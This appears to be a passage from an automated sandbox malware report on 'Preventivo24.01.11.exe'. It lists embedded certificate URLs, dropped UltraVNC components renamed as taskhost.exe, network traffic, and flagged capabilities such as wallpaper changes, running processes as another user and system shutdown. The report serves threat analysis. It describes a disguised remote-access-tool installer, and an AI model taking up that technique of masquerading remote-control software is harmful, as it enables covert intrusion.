Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.dr String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Drops certificate files (DER)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Games\taskhost.exe Code function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey, 41_2_001154D0
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0100AD30 NtdllDefWindowProc_W, 0_2_0100AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W, 0_2_00F773D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00F005B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString, 0_2_00E98520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAEA60 NtdllDefWindowProc_W, 0_2_00EAEA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E98BD0 NtdllDefWindowProc_W, 0_2_00E98BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA2CE0 NtdllDefWindowProc_W, 0_2_00EA2CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow, 0_2_00E9ADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBCDD0 NtdllDefWindowProc_W, 0_2_00EBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00EA2E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection, 0_2_00EA9070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9B5C0 NtdllDefWindowProc_W, 0_2_00E9B5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F555C0 NtdllDefWindowProc_W, 0_2_00F555C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9BC20 NtdllDefWindowProc_W, 0_2_00E9BC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00E97D50
Contains functionality to launch a process as a different user
Source: C:\Games\taskhost.exe Code function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces 41_2_000CB8D0
Contains functionality to shutdown / reboot the system
Source: C:\Games\taskhost.exe Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces 41_2_000CB8D0
Detected potential crypto function
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A4836 0_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A4942 0_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009700AC 0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00970251 0_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01002440 0_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E81490 0_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAF6F0 0_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC5910 0_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FD7CE0 0_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FD3C50 0_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101C3F0 0_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01020210 0_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBE4E0 0_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010AC5E2 0_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0109A7D0 0_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB6600 0_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB2743 0_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A29F3 0_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01018800 0_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0106CA10 0_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC2BA0 0_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0102CA50 0_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01092DEE 0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB4E40 0_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01020FB0 0_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0100CED0 0_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0109317C 0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAB090 0_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAF180 0_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA3390 0_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E83480 0_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01029470 0_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01073650 0_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBF740 0_2_00EBF740
